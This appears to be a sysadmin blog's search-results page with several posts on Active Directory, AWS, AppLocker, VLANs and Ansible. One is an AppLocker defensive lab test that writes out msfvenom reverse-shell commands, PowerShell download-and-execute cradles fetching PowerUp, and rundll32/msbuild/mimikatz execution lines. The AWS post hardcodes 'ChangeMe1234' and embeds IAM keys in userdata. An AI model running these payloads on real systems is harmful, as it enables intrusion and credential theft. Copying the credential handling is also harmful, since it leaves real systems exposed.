top of page

82 results found with an empty search

  • Create 73,000 Test AD User Accounts

    Need to bulk-create Domain Users? This PowerShell script can generate over 73,000 accounts right out of the box. Want more? Just add extra first and last names to the CSV. While 73,000 test accounts should cover more than you’ll ever realistically need, the script can also be tweaked, remove the randomization and it’ll build real users directly from your CSV list. Download the following script (CreateTestUsers.txt) and names.csv and copy them to C:\Downloads Rename the 'CreateTestUsers.txt' to 'CreateTestUsers.ps1', open in PowerShell_ISE and update the domain specific entries. Run the script and enter the number of accounts required. During testing the higher the percentage of maximum accounts the slower the script runs, it struggles to make unique names. The accounts create have their Profile and Home shares, Group Membership Each account created has a random 14-character password that is outputted at the end to C:\Downloads\results.txt Here's the script... #Get OU for users import-module ActiveDirectory #Get Targetted OU $orgOU = Get-ADOrganizationalUnit "ou=Test Users,ou=Org,dc=sh,dc=loc" $orgOU.distinguishedname #set password length $length = "14" #Outs the account and password created $results = "C:\Downloads\results.txt" #Declares Inheritance $inherNone = [System.Security.AccessControl.InheritanceFlags]::None $propNone = [System.Security.AccessControl.PropagationFlags]::None $inherCnIn = [System.Security.AccessControl.InheritanceFlags]::ContainerInherit $propInOn = [System.Security.AccessControl.PropagationFlags]::InheritOnly $inherObIn = [System.Security.AccessControl.InheritanceFlags]::ObjectInherit $propNoPr = [System.Security.AccessControl.PropagationFlags]::NoPropagateInherit #current number of users in OU $aduE = get-aduser -filter {samaccountname -like "*"} -SearchBase $orgOU $existing = $aduE.count #Import list of first and surnames $Names = "C:\Downloads\names.csv" #Imports and works out max possible users that can be created $impName = Import-Csv -path $Names $FNCT = ($impName.firstname | where {$_.trim() -ne ""}).count $SNCT = ($impName.surname | Where {$_.trim() -ne ""}).count $maxUN = $FNCT * $SNCT $total = ($maxUn.ToString()) -10 do {$enter = ([int]$NOS = (read-host "Max User accounts is "$total", how many do you need")) } until ($nos -le $total) $UserLists=@{} #Randomises first and surnames do { $FName = ($impName.firstname | where {$_.trim() -ne ""})|sort {get-random} | select -First 1 $SName = ($impName.surname | Where {$_.trim() -ne ""}) |sort {get-random} | select -First 1 $UserIDs = $Fname + "." + $Sname try {$UserLists.add($UserIds,$UserIDs)} catch {} $UserIDs = $null Write-Host $UserLists.count } until ($UserLists.count -eq $nos) $UserLists.count $userlists.GetEnumerator() $UserLists.key $ADUs = $UserLists.values Foreach ($ADu in $ADus) { #Set var for random passwords $Assembly = Add-Type -AssemblyName System.Web $RandomComplexPassword = [System.Web.Security.Membership]::GeneratePassword($Length,4) Foreach ($pwd in $RandomComplexPassword) { #Splits username to be used to create first and surname $ADComp = get-aduser -filter {samaccountname -eq $ADU} $spUse = $ADu.Split('.') $firstNe = $spUse[0] $surNe = $spUse[1] $pwSec = ConvertTo-SecureString "$pwd" -AsPlainText -Force #Creates user accounts if ($ADComp -eq $null) { New-aduser -Name "$ADU" ` -SamAccountName "$ADU" ` -AccountPassword $pwSec ` -GivenName "$firstNe" ` -Surname "$surNe" ` -Displayname "$FnS" ` -Description "TEST $ADu" ` -Path $orgOU ` -Enable $true ` -ProfilePath "\\shdc1\Profiles$\$ADU" ` -HomeDirectory "\\shdc1\Home$\$ADU" ` -HomeDrive "H:" ` #Creates Home Directory and Sets permissions New-Item "\\shdc1\Home$\$ADU" -ItemType Directory -force $gADU = Get-ADUser $ADU $H = "\\shdc1\Home$\$ADU" $getAcl = Get-Acl $H $fileAcc = New-Object System.Security.AccessControl.FileSystemAccessRule($gADU.sid, "MODIFY", "$inherCnIn,$inherObIn", "None", "Allow") $getacl.setAccessRule($fileAcc) Set-Acl $H $getacl #Add Group membership Add-ADGroupMember -Identity "DFSAccess"-Members $ADU #Outs results to Results file $adu | out-file $results -Append $pwd | out-file $results -Append " " | out-file $results -Append } else {"nope exists "} Write-host $ADU } } # Total users in OU $aduC = get-aduser -filter {samaccountname -like "*"} -SearchBase $orgOU $TotalU = $aduC.count #Total users created Write-host "Total New Users" $TotalU - $existing

  • Deploying Windows Domains as an EC2 Instance with PowerShell - Part 2

    Welcome to Part 2! Let's take a deep dive into the specifics of what the DeployVPCwithDomain.ps1 script creates in AWS. Here's a quick recap, a public-facing Remote Desktop Server (RDS) and a private Domain Controller (DC) will be deployed into AWS with all the required AWS infrastructure and services using PowerShell. If you haven't read Part 1, I strongly suggest you do and ensure all the prerequisites are fulfilled, otherwise, it's likely to get messy. To reiterate, deploying this will incur AWS costs, the instance type is t3.medium and the volume is set to $ebsVolType = "io1" and $ebsIops = 1000 Prerequisites PowerShell version 7 or Visual Code Studio is required An AWS Account and its corresponding Access ID and Secret Key. The AWS account requires the AdministratorAccess' role or delegated permissions. A basic understanding of both AWS and Windows Domains This blog will focus on the execution of the script and the provisioning of the AWS services, including the configuration of the VPC, subnets, and security groups and the deployment of EC2 instances. You’ll also see how the script sets up a fully functional Active Directory environment, complete with a domain controller, OU, Delegation and GPO configuration. Let's Get Started! Let's begin by loading DeployVPCwithDomain.ps1 in Visual Studio Code with elevated rights. I normally 'Ctrl + A' and then press F8 to execute the script, equally F5 works. The script starts by installing the necessary AWS PowerShell modules from PowerShell Gallery. Loading the modules can be problematic. If any of the modules fail, the script should catch the error. I suggest closing VSC, deleting the modules from "C:\Users\%username%\Documents\PowerShell\Modules\", and then restart the script from VCS. Access Key and Secret Access Key Enter both the Access Key and Secret Key created for the service account. Regions The script sets the default AWS region using `Set-defaultAWSRegion -Region $region1`, and this region is also hardcoded in the userdata script for both S3 and EC2 instances. $region1 = "us-east-1" # this is hardcoded in the ec2 userdata script Set-defaultAWSRegion -Region $region1 VPC The VPC is configured with the following CIDR block: `$cidr = "10.1.1"` and `$cidrFull = "$($cidr).0/24"`. This CIDR block specifies the VPC's address range, providing 254 usable IP addresses. $cidr = "10.1.1" $cidrFull = "$($cidr).0/24" $newVPC = New-EC2vpc -CidrBlock "$cidrFull" $vpcID = $newVPC.VpcId Subnets Two subnets, each with 30 usable addresses will be created from the VPC: one for public access and one for private use. $Ec2subnetPub = New-EC2Subnet -CidrBlock "$($cidr).0/27" -VpcId $vpcID $Ec2subnetPriv = new-EC2Subnet -CidrBlock "$($cidr).32/27" -VpcId $vpcID Internet Gateway An Internet Gateway enables communication between your VPC and the Internet by acting as a bridge, allowing instances within your VPC to send and receive traffic from the Internet. $Ec2InternetGateway = New-EC2InternetGateway $InterGatewayID = $Ec2InternetGateway.InternetGatewayId Add-EC2InternetGateway -InternetGatewayId $InterGatewayID -VpcId $vpcID Public and Private Route Tables To enable internet access for your VPC's public subnet, you'll need to create a route table and configure it to direct traffic to the Internet Gateway. $Ec2RouteTablePub = New-EC2RouteTable -VpcId $vpcID New-EC2Route -RouteTableId $Ec2RouteTablePub.RouteTableId -DestinationCidrBlock "0.0.0.0/0" -GatewayId $InterGatewayID Register-EC2RouteTable -RouteTableId $Ec2RouteTablePubID -SubnetId $SubPubID Public IP `Invoke-WebRequest`, fetches your public IP address by querying ` ifconfig.me/ip` . If the request fails or returns an empty value, it defaults to "10.10.10.10". $whatsMyIP = (Invoke-WebRequest ifconfig.me/ip).Content.Trim() if ([string]::IsNullOrWhiteSpace($whatsMyIP) -eq $true){$whatsMyIP = "10.10.10.10"} If the Jump box becomes inaccessible and unless your public IP is static, it's likely to change, making it necessary to update the public security group. Security Groups This script creates 2 security groups within a specified VPC. The PublicSubnet security group to manages traffic rules for public subnet instances. $SecurityGroupPub = New-EC2SecurityGroup -Description "Public Security Group" -GroupName "PublicSubnet" -VpcId $vpcID -Force -errorAction Stop The script defines inbound and outbound rules for a security group. # Inbound Rules $InTCPWhatmyIP3389 = @{IpProtocol="tcp"; FromPort="3389"; ToPort="3389"; IpRanges="$($whatsMyIP)/32"} # Outbound Rules $EgAllCidr = @{IpProtocol="-1"; FromPort="-1"; ToPort="-1"; IpRanges=$cidrFull} `Grant-EC2SecurityGroupIngress applies inbound rules to the defined security group. Grant-EC2SecurityGroupIngress -GroupId $SecurityGroupPub -IpPermission @($InTCPWhatmyIP3389) S3 Bucket An S3 bucket is created to host the AD script. $news3Bucket = New-S3Bucket -BucketName "auto-domain-create-$($dateTodayMinutes)" $s3BucketName = $news3Bucket.BucketName $S3BucketARN = "arn:aws:s3:::$($s3BucketName)" $s3Url = "https://$($s3BucketName).s3.amazonaws.com/Domain/" S3 Bucket Access To grant EC2 instance access to the S3 bucket for running the AD script, a new IAM user is created. $s3User = "DomainCtrl-S3-READ" $newIAMS3Read = New-IAMUser -UserName $s3User A new access key for the specified IAM user is generated and written into the UserData allowing the EC2 instance access to securely authenticate and access the S3 bucket. $newIAMAccKey = New-IAMAccessKey -UserName $newIAMS3Read.UserName $iamS3AccessID = $newIAMAccKey.AccessKeyId $iamS3AccessKey = $newIAMAccKey.SecretAccessKey The following IAM Group is created and the IAM user added to the group. $s3Group = 'S3-AWS-DC' New-IAMGroup -GroupName 'S3-AWS-DC' Add-IAMUserToGroup -GroupName $s3Group -UserName $s3User The policy for read access to the S3 bucket is defined. $s3Policy = @' { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": [ "s3:Get*", "s3:List*", "s3:Describe*" ], "Resource": "*" } ] } '@ The IAM policy is created and added to the above group. $iamNewS3ReadPolicy = New-IAMPolicy -PolicyName 'S3-DC-Read' -Description 'Read S3 from DC' -PolicyDocument $s3Policy Register-IAMGroupPolicy -GroupName $s3Group -PolicyArn $iamNewS3ReadPolicy.Arn VPC Endpoint A VPC endpoint, which allows resources within your VPC to privately connect to AWS services without needing an internet gateway is created to allow the Private EC2 instance to access the S3 Bucket. $newEnpointS3 = New-EC2VpcEndpoint -ServiceName "com.amazonaws.us-east-1.s3" -VpcEndpointType Gateway -VpcId $vpcID -RouteTableId $Ec2RouteTablePubID, $Ec2RouteTablePrivID UserData Scripts EC2 Userdata provides commands automatically to the instance at its initial launch and at first boot. In this case, the PowerShell script changes the default AWS assigned password to 'ChangeMe1234' and renames the EC2 instance to JUMPBOX1 for the Public instance. $RDPScript = ' Set-LocalUser -Name "administrator" -Password (ConvertTo-SecureString -AsPlainText ChangeMe1234 -Force) Rename-Computer -NewName "JUMPBOX1" shutdown /r /t 10 ' The PowerShell script for EC2 instance Userdata is encoded in Base64 because AWS requires userdata to be in this format. $RDPUserData = [System.Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes($RDPScript)) EC2 Encrypted Volumes EC2 encrypted volumes use AWS Key Management Service (KMS) to automatically encrypt data at rest, in transit between the instance and the volume, and during snapshots. This ensures that all data on the volume is securely protected, with encryption keys managed by AWS. To enable EC2 encrypted volumes, KMS permissions must be granted in IAM, and the following values will be specified. $ebsVolType = "io1" $ebsIops = 2000 $ebsTrue = $true $ebsFalse = $false $ebskmsKeyArn = $newKMSKey.Arn $ebsVolSize = 50 $blockDeviceMapping = New-Object Amazon.EC2.Model.BlockDeviceMapping $blockDeviceMapping.DeviceName = "/dev/sda1" $blockDeviceMapping.Ebs = New-Object Amazon.EC2.Model.EbsBlockDevice $blockDeviceMapping.Ebs.DeleteOnTermination = $enc $blockDeviceMapping.Ebs.Iops = $ebsIops $blockDeviceMapping.Ebs.KmsKeyId = $ebsKmsKeyArn $blockDeviceMapping.Ebs.Encrypted = $ebsTrue $blockDeviceMapping.Ebs.VolumeSize = $ebsVolSize $blockDeviceMapping.Ebs.VolumeType = $ebsVolType Additional help can be found @ https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2/image/block_device_mappings.html EC2 Instance Attributes The New-EC2Instance command and the following configuration parameters are declared to deploy and manage the EC2 instances in AWS. $new2022InstancePub = New-EC2Instance ` -ImageId $gtSrv2022AMI.value ` -MinCount 1 -MaxCount 1 ` -KeyName $newKeyPair.KeyName ` -SecurityGroupId $SecurityGroupPub ` -InstanceType t3.medium ` -SubnetId $SubPubID ` -UserData $RDPUserData ` -BlockDeviceMapping $blockDeviceMapping Accessing the Jump Box The public RDP jump box, accessible only from your public IP, will launch quickly. Retrieve the instance's public IP from the AWS EC2 page, type 'mstsc' at the Run command, and enter the IP. Be sure to wait for the instance to fully initialize before connecting. Enter 'Administrator' and the password 'ChangeMe1234', once logged on, change the password to something more secure. Accessing the Domain Controller The Domain Controller will take some time to deploy, even after it shows as Running on the EC2 page. It undergoes a few reboots and runs scripts to install AD roles, create an OU structure, delegate access, and set up the GPOs. It's a good time to grab a coffee and take a 10-minute break. Once you've finished your coffee, retrieve the Domain Controller's private IP, based on the VPC Private Subnet, from within the AWS EC2 page. Then, from within the Jump box, launch 'mstsc' and enter the Domain Controller's IP. The FQDN for the domain is 'testdom.loc'. Enter 'Administrator' and the password 'ChangeMe1234'. To update the password, open 'Active Directory Users and Computers', find the 'Administrator' account, and reset the password. OU Structure A comprehensive OU structure with GPOs, URA, and Restricted and Nested Groups is deployed in a tiered model. It's too involved to cover here, but a full description can be found @ https://www.tenaka.net/post/deploy-domain-with-powershell-and-json-part-2-ou-delegation JSON The script deployed for AWS is a slightly modified version of the original. Similarly, it is tied to the hostname of the Domain Controller, which is hardcoded as 'AWSDC01' in both the UserData and the JSON file. The other modification involves the IP address. The IP section in the JSON file is ignored, with the Domain Controller being statically assigned the IP provided by AWS's DHCP server. { "FirstDC": { "PDCName":"AWSDC01", "PDCRole":"true", "IPAddress":"10.0.2.69", "Subnet":"255.255.255.0", "DefaultGateway":"10.0.2.1", "CreateDnsDelegation":"false", "DatabasePath":"c:\\Windows\\NTDS", "DomainMode":"WinThreshold", "DomainName":"testdom.loc", "DomainNetbiosName":"TESTDOM", "ForestMode":"WinThreshold", "InstallDns":"true", "LogPath":"c:\\Windows\\NTDS", "NoRebootOnCompletion":"false", "SysvolPath":"c:\\Windows\\SYSVOL", "Force":"true", "DRSM":"Recovery1234", "DomAcct":"Administrator", "DomPwd":"ChangeMe1234", "PromptPw":"false" }, Finally..... These two posts only scratch the surface of deploying Active Directory on AWS with PowerShell. Additional AD Sites, VPN's, AWS Transit Gateways and AD integration into AWS are some of the topics I hope to cover in the future. For now, thank you for taking the time to read my blog; I truly appreciate it. I hope you found it useful.

  • Applocker - Are Publisher Rules Necessary

    This is a supplement to the Applocker vs Malware article that you should read first @ https://www.tenaka.net/applocker-vs-malware I've comprehensively covered Applocker and its 'features' on this site from click-bait prevention with an out-of-the-box configuration to hardening Applocker to protect the protector from being circumvented. The latter's policy is a combination of Publisher, hash, file and folder approvals and denials. Before I start, the following is not recommended, this is for exploratory testing and proof of concept of Applocker's behaviour. Does Applokcer require all those Publisher approvals? Can the system be protected with only file and folder approvals and denies? Previous - Applocker vs Malware The client is Windows 11 Enterprise x64 with no AV protection and all tests will be executed as the user, unless specified. The Policy - Approvals Applocker will be configured with the following approval policy: EXEs, MSIs, Scripts and DLLs are configured to approve any file in %ProgramFile% and %WinDir%, similar to the default rules. The Policy - Denies Protection relies solely on preventing any bypass or escalation of code, denying any directory the user has 'Write' permission for EXEs, MSIs, Scripts and DLLs. The following directory list is dynamic and changes with different installed languages. Download and run my Security Validation script ( here ) when non-US languages are installed. C:\Windows\System32\LogFiles\WMI C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys C:\Windows\System32\Tasks C:\Windows\System32\Tasks\Microsoft\Windows\RemoteApp and Desktop Connections Update C:\Windows\SysWOW64\Tasks C:\Windows\SysWOW64\Tasks\Microsoft\Windows\RemoteApp and Desktop Connections Update C:\Windows\tracing C:\Windows\PLA\Reports C:\Windows\PLA\Reports\en-US C:\Windows\PLA\Rules C:\Windows\PLA\Rules\en-US C:\Windows\PLA\Templates C:\Windows\Registration\CRMLog C:\Windows\servicing\Packages C:\Windows\servicing\Sessions C:\Windows\System32\Com\dmp C:\Windows\System32\spool\drivers\color C:\Windows\System32\spool\PRINTERS C:\Windows\System32\spool\SERVERS C:\Windows\System32\Tasks\Microsoft\Windows\PLA C:\Windows\System32\Tasks\Microsoft\Windows\PLA\System C:\Windows\SysWOW64\Com\dmp C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System C:\Windows\Tasks C:\Windows\Temp C:\Users C:\ProgramData To prevent Living off the Land by Microsofts signed programs I'm following Microsofts recommended deny list ( here ) as a baseline. I've added a few more to my list as part of an automated Applocker script to protect the system from various attacks ( here ). The final config should look something like this. The Rematch Simple, generate reverse shells with MSFVenom and execute whilst trying to bypass Applocker. EXE Generate an exe with the following command. Password1234msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.1 lport=8888 -f exe -o /home/user/Malware/rev1.0.exe Execution is prevented by denying C:\Users\* HTA Generate a HTML Application Payload (HTA) with the following: msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.1 lport=8888 -f hta-psh -o /home/user/Malware/rev1.0.hta Execute the following command after downloading the .hta file to the local system. mshta.exe C:\users\user\download\rev1.0.hta Execution is prevented by denying mshta.exe, a signed Microsoft program. Word Macro The following MSFConsole command generates a reverse shell for Microsoft Word. ​ use exploit/multi/fileformat/office_word_macro set TARGET 0 set lhost 10.0.0.1 set lport 8888 The Word Macro unpacks to an .exe, it's prevented from executing by denying execution within C:\Users\ Powershell Generate a reverse shell PS1 script with the following command. msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.1 lport=8888 -f ps1 -o /home/user/Malware/rev1.0.ps1 Execution is prevented by denying C:\Users\* Powershell Web Local PowerShell scripts are blocked, what of remote calls that load into memory!! ​ powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘ https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks” ​ powershell -ExecutionPolicy Bypass -Command "[scriptblock]::Create((Invoke-WebRequest " https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1" -UseBasicParsing).Content).Invoke();" Constrained Language mode is still protecting the system. DLL The following command creates a DLL reverse shell. ​ msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.1 lport=8888 -f dll -o /home/user/Malware/rev1.1.dll ​ Download and execute the following commands from the Windows client. ​ copy rev1.1.dll C:\Windows\Temp rundll32.exe C:\Windows\Temp\rev1.1.dll,0 Execution is prevented by denying directories, in this case, C:\Windows\Temp, where the users can 'Write' and would have been an authorised path. Reverse Shell and MimiKatz as XML The following command generates an XML reverse shell. msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.1 lport=8888 -f csharp -o /home/user/Malware/rev1.5.xml cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319 Execute the following commands. msbuild.exe C:\users\admin\downloads\mimikatz.xml msbuild.exe C:\users\admin\downloads\rev1.5.xml Execution is prevented by denying msbuild.exe, a signed Microsoft program. Standing Eight Count Keeping with the boxing analogy for Applocker verses, I hope 'Standing Eight Count' is appropriate. A correctly implemented Applocker policy as described above does prevent various types of malware from execution under the user context. Execution is constrained to authorised named directories, 'Program Files' and 'Windows'. Directories that allow the user to 'Write' deny any type of execution. Is this approach recommended? No, the chances of maintaining the perfect deny policy is slim in the real real-world. Any exception to the deny ruleset leaves the system open to bypassing Applocker without any Publisher rules to fall back on. Finally, I did this to better understand Applocker's behaviour, not as a serious method to implement. It does validate the benefits of configuring a deny policy.

  • Staying Safe on the Internet: Essential Tips for Protecting Yourself Online

    These days, the Internet is such a big part of our daily lives. Whether we’re banking, chatting with friends, shopping, or learning something new, we’re always online. While it opens up a world of possibilities, it also comes with risks to our personal info, privacy, and security. As cyber threats keep evolving, it’s more important than ever to know how to stay safe online. Let’s go over a few simple tips to help you protect yourself while navigating the Internet. Use Strong, Unique Passwords Your password is your first line of defense against unauthorized access. Make sure it’s strong and unique. A good password should conform to the following: Reusing passwords or partial passwords across multiple accounts can put you at significant risk. When a company or service is hacked, user data, including usernames and passwords, can be stolen. These credentials are often sold or shared on the dark web or hacker forums. Even if only one account is compromised, reusing the same password across different accounts can have a ripple effect. Be at least 12 characters long, mine are at least 20. Include a mix of uppercase and lowercase letters, numbers, and symbols. Avoid easily guessable words like "password" or personal information such as your name or birthday. Change your passwords every 6 to 12 months. Tip: Consider using a password manager to store and generate secure passwords. Enable Two-Factor Authentication (2FA) Two-factor authentication adds an extra layer of security by requiring a second form of verification in addition to your password. This could be a code sent to your phone, a fingerprint, or facial recognition. Even if someone has your password, they won’t be able to access your account without the second factor. Tip: Use the Google Authenticator App Keep Software and Devices Updated Cybercriminals often exploit vulnerabilities in outdated software to gain access to your devices. Regularly updating your operating system, apps, and antivirus software helps protect against these vulnerabilities. Enable automatic updates on your devices to ensure you always have the latest security patches. Remove infrequently or unused Apps from your phone. Be Smart with Downloads Downloading software or files from untrusted websites can expose your device to malware. Only download apps from official stores (such as Google Play or the Apple App Store) and avoid pirated content. Malware can steal sensitive information or even hold your device hostage (ransomware). Tip: Ensure all devices have Anti-Virus Software. Be Cautious with Public Wi-Fi Public Wi-Fi networks, like those in cafes or airports, can be convenient but risky. Hackers can intercept your data if you’re not careful. Avoid accessing sensitive accounts (such as banking or email) over public Wi-Fi without using a virtual private network (VPN). A VPN encrypts your data and adds an extra layer of protection. Beware of Phishing Scams Phishing scams are attempts by cybercriminals to trick you into revealing personal information by pretending to be someone trustworthy, such as a bank or a colleague. These scams often come in the form of emails or text messages that contain malicious links or attachments. How to Avoid Phishing Don’t click on links or download attachments from unknown senders. Verify the sender’s email address and look for suspicious grammar or spelling errors. If you receive a suspicious email from a legitimate organization, contact them directly using verified contact information. Use Privacy Settings On social media platforms and other online services, take the time to review and adjust your privacy settings. Limit the amount of personal information you share publicly, and ensure that only trusted individuals can view your private details. Many websites and apps track your online activity, so disabling tracking features can improve your privacy. Secure Your Home Wi-Fi Network Your home Wi-Fi network is the gateway to all of your internet-connected devices. To protect it: Change the default router password to something strong and unique. Use WPA3 or WPA2 encryption. Hide your network by disabling SSID broadcasting. Enable a guest network for visitors, so they don’t have access to your main devices. Monitor Your Online Accounts Regularly monitoring your accounts can help you spot suspicious activity early. Many online services offer notifications for unusual activity, such as login attempts from unknown devices. If you notice anything out of the ordinary, change your password immediately and report the issue to the service provider. Tip: Set up account activity alerts where possible to stay informed of any unusual actions. Educate Yourself The digital world is constantly evolving, and so are the threats. Staying informed about the latest online security trends can help you avoid falling victim to new scams or vulnerabilities. Follow trusted security blogs, attend webinars, and consider taking online courses to enhance your knowledge of cybersecurity. Conclusion By practicing these habits, you can significantly reduce the risk of falling victim to cyber-attacks. Staying safe on the internet requires vigilance, but by taking the right precautions, you can enjoy the benefits of the digital world with peace of mind. Protect your personal information, stay alert to potential threats, and always prioritize your online safety.

  • Enabling Raspberry Pi vLAN Tagging

    Back in December 24, I put together an article on installing and configuring a Raspberry Pi and Pi-Hole. It’s over here if you’re curious: https://www.tenaka.net/post/pi-hole-ad-blocker-setup . The initial deployment was a straightforward dual-Pi setup on a flat 192.168.0.0/24 network. It was simple to manage and, at the time, I was content relying on the existing Windows security and Firewall controls to protect the domain-joined systems. However, as the network footprint expanded, with an increasing number of Internet facing devices and other less-trustworthy endpoints, "stuff" made East of where I live, the risk profile changed significantly. Relying on a flat topology became untenable, and the lack of segmentation started to feel like an open invitation for lateral movement. It was clear the convenience trade-off had reached its limit. So I decided to implement a vLAN or 2, let me provide a very basic explanation of vLANs. VLAN (Virtual LAN) A VLAN (Virtual LAN) is a logical segmentation of a network at Layer 2 that allows you to group devices as if they were on separate physical networks, even if they share the same switch or cable. By isolating traffic between VLANs, the broadcast domains are reduced and lateral movement is limited, improving both performance and security. Communication between VLANs requires routing, typically through a Layer 3 switch and, in my case, a new PFSense firewall, giving control over the ports and IP's that can communicate. That covers the why , but not the how , specifically how I got VLAN tagging working on the Raspberry Pis. On Windows, it’s pretty much a checkbox and you're done. On Raspbian ? Yeah... not quite that simple. Before bashing the keyboard, PiHole is at version 6.0.6, installed on Raspberry Pi 4's with 4Gb RAM, with Raspbian being at version 6.6 plus all the latest updates. IP addresses are DHCP assigned and then reserved. Install VLAN Package Install the latest updates and then vlan package. sudo apt update sudo apt install vlan Load the 8021q kernel module, which is essential for enabling VLAN tagging on network interfaces. sudo modprobe 8021q echo "8021q" | sudo tee -a /etc/modules Define how VLANs are created and configured. sudo nano /etc/systemd/network/25-vlan.network [Match] Name=eth0.VLAN_ID [Network] DHCP=yes This file instructs systemd-networkd how to create and manage the VLAN interface sudo nano /etc/systemd/network/25-vlan.netdev [NetDev] Name=eth0.VLAN_ID Kind=vlan [VLAN] Id=VLAN_ID Update the VLAN tagging on the network switch that the Pi's are plugged into. Restart the network interface. sudo systemctl restart networking sudo systemctl status networking Confirm the IP has updated from 192.168.0.70 to 192.168.10.70. ip addr show Finally, I updated the Domain Controller's DNS Forwarders to point to the new addresses.

  • Deny Domain Admins Logon to Workstations

    There's a common theme running through many of the security articles on this site. Prevent lateral movement of hackers around the domain searching for escalation points to elevate to Domain Admins. Preventing escalation via cached or actively logged on privileged accounts can be accomplished with segregated tiers between Workstations, Servers and Domain Controllers. Implementing tiers does not prevent exploitation of system vulnerabilities and escalating via an RCE for example. Tier 0 - Domain Admins, CA's, plus any management service running agents on the DC's. Tier 1 - Member Servers. Tier 2 - Workstations. Segregation is achieved with the use of User Rights Assignments (URA) via Group Policy, additional admin accounts and AD groups. The initial concept is easy, don't allow any account access across the boundaries between Workstation, Server or DC. Workstation admin accounts are prevented from logging on to servers and DC's. Server admins or server service accounts are unable to login to a Workstation or DC. Domain Admins never log on to anything but DC's. The theory sounds easy until management agents are installed on DC's. There's the potential for the SCOM or SCCM\MECM admin to fall victim to an attack. The attacker is granted System on the DC's via the agent, despite the admin not being a Domain Admin. I recommend not installing management agents on DC's or CA's. One solution, as this is the real world, install the management applications with an installer account and delegate privileges to the relevant groups and triers, making sure not to cross the streams. Or create an additional tier for management servers with agents deployed to DC's. The downside of tiers is extra accounts. If you're the DA then 3, possibly 4 admin accounts per domain are required. There's no perfect solution or one size fits all, aim to separate the tiers but allow for flex in the solution. The only hard and fast rule is 'never allow any server admin or DA to login to workstations.' Before starting Domain Administrator privileges are required. First create the AD Groups for denying Domain Controller, Server and Workstation logon. Open 'AD Users and Computers' and create the following AD Groups: RA_Domain Controller_DenyLogon RA_Server_DenyLogon RA_Workstation_DenyLogon Create the following accounts: tenaka_wnp (workstation administrator) tenaka_snp (server administrator) tenaka_dnp (domain admin) Going to assume you're happy creating Restrictive Groups in Group Policy and assigning them to OU's. Create the following AD Groups, assigning them to the relevant OU. PR_Workstation_Admins PR_Server_Admins Add tenaka_wnp to PR_Workstation_Admins Add tenaka_snp to PR_Server_Admin Add tenaka_dnp directly to Domain Admins, don't nest groups within Domain Admins. RA_ designates User Rights Assignment. PR_ designates PRivileged account. This is part of a naming convention used within this Domain. Open RA_Workstation_DenyLogon group. Add Domain Admins, all server service accounts and PR_Server_Admin. Create a new GPO for the Workstations OU. Update the following User Rights Assignments with RA_Workstations_DenyLogon. Deny log on as a batch Deny log on as a service Deny log on locally Deny log on through Remote Desktop Services Open the RA_Server_DenyLogon group Add Domain Admins, PR_Workstation_Admin and service accounts not deployed to a server. Svc_scom_mon_ADMP performs synthetic transactions testing the performance of internal websites and DNS lookups. Create a new GPO for the Servers OU Update the following User Rights Assignments with RA_Server_DenyLogon Deny log on as a batch Deny log on as a service Deny log on locally Deny log on through Remote Desktop Services Open the RA_Domain Controller_DenyLogon group. Add PR_Workstation_Admin, PR_Server_Admin and service accounts not used on DC's. Create a new GPO for the Domain Controller container. Update the following User Rights Assignments with RA_Domain Controller_DenyLogon Deny log on as a batch Deny log on as a service Deny log on locally Deny log on through Remote Desktop Services Run gpupdate /force on a workstation, server and domain controller to apply the changes, a restart may be necessary. All that remains is testing. Attempt to login to a workstation with tenaka_wnp, tenaka_snp, tenaka_dnp, the only account that will successfully login is tenaka_wnp. Attempt to logon to the server with tenaka_wnp, tenaka_snp, tenaka_dnp, the only account that will successfully logon is tenaka_snp Attempt to logon to a Domain Controller with tenaka_wnp, tenaka_snp, tenaka_dnp, the only account that will successfully logon is tenaka_dnp

  • When a Microsoft Engineer Meets Open Source: Deploying VS Code on Rocky Linux with Ansible.

    As a Microsoft engineer, deploying Visual Studio Code on Rocky Linux using Ansible highlights the intersection of enterprise-grade tools and open-source flexibility. While much of my experience revolves around the Microsoft ecosystem, there’s a certain satisfaction in utilizing the power of YAML and automation to streamline deployment processes. Ansible, a robust open-source automation tool, allows engineers to efficiently manage configurations, resolve dependencies, and ensure consistent deployments. This guide outlines the steps and considerations for deploying Visual Studio Code on a Rocky Linux system using Ansible, demonstrating how to combine open-source tools with Microsoft's developer resources for maximum efficiency. So why Rocky Linux? Why Ansible? Because, in the spirit of open source, we go where the community goes. And because, as much as I love PowerShell, sometimes you just want to let Linux do its thing. Let’s dive in and show the world that even a Microsoft engineer can deploy Microsoft software with an open-source tool on a Linux distro. Spoiler alert: It’s actually kind of awesome. Pre-Requisites Steps Before diving into Ansible, we have set up three Rocky Linux virtual machines, each configured with 2 CPUs and 4GB of RAM. Rocky Linux Nodes rocky01 = 192.168.0.28 - Ansible Controller rocky02 = 192.168.0.38 - Dev Node 01 rocky03 = 192.168.0.39 - Dev Node 02 Create an Admin User During the setup, each node was configured with a user account named 'user' that has administrator privileges. If root was used instead, create an account with the following configuration: sudo root sudo adduser user sudo passwd user sudo usermod -aG wheel user Install SSH on Dev Nodes (02-03) SSH to each of the Dev nodes ssh user@192.168.0.38 ssh user@192.168.0.39 Install openssh-server sudo dnf install openssh-server Create a Public\Private Key on the Ansible Controller Generate an SSH key using the user account. ssh-keygen -t ed25519 -C "ansible controller" Either provide a file name or use the default option. If you choose to specify a file name, ensure you include the full path. For best practice, enter a password. However, pressing Enter without typing anything will leave the password blank. ssh-keygen: This is the command used to generate, manage, and convert SSH keys. -t ed25519: Specifies the type of key to create. ed25519 is an elliptic-curve signature algorithm that provides high security with relatively short keys. It is preferred for its performance and security over older algorithms like rsa or dsa. -C 